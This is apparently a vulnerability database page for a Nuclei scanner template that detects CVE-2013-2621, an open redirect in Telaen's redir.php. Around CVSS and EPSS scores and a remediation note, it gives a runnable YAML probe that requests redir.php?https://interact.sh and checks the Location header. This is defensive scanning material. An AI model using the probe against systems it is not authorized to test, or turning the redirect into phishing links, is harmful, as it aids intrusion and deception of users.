Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2013-2621
HistoryJun 11, 2023 - 5:47 a.m.

Telaen => v1.3.1 - Open Redirect

2023-06-1105:47:02
ProjectDiscovery
github.com
7
cve2013
telaen
redirect
vulnerability
phishing
upgrade
open redirect
crafting
url
exploit
arbitrary websites
remote attackers
installation of malware

5.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

6.2 Medium

AI Score

Confidence

High

0.034 Low

EPSS

Percentile

91.5%

Open Redirection Vulnerability in the redir.php script in Telaen before 1.3.1 allows remote attackers to redirect victims to arbitrary websites via a crafted URL.
id: CVE-2013-2621

info:
  name: Telaen => v1.3.1 - Open Redirect
  author: ctflearner
  severity: medium
  description: |
    Open Redirection Vulnerability in the redir.php script in Telaen before 1.3.1 allows remote attackers to redirect victims to arbitrary websites via a crafted URL.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
  remediation: |
    Upgrade to the latest version of Telaen to fix the open redirect vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/38546
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/84683
    - https://nvd.nist.gov/vuln/detail/CVE-2013-2621
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2013-2621
    cwe-id: CWE-601
    epss-score: 0.03563
    epss-percentile: 0.90674
    cpe: cpe:2.3:a:telaen_project:telaen:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: telaen_project
    product: telaen
  tags: cve2013,cve,telaen,redirect,telaen_project

http:
  - method: GET
    path:
      - "{{BaseURL}}/telaen/redir.php?https://interact.sh"
      - "{{BaseURL}}/redir.php?https://interact.sh"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# digest: 4a0a00473045022047d42b34a035b4f67b78f16f771a7b48591281e968fc8d1650ad9b7808049305022100e564b5514038061f581a413e252920c2f837099327c21c6c6dda604704f18731:922c64590222798bb761d5b6d8e72950

5.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

6.2 Medium

AI Score

Confidence

High

0.034 Low

EPSS

Percentile

91.5%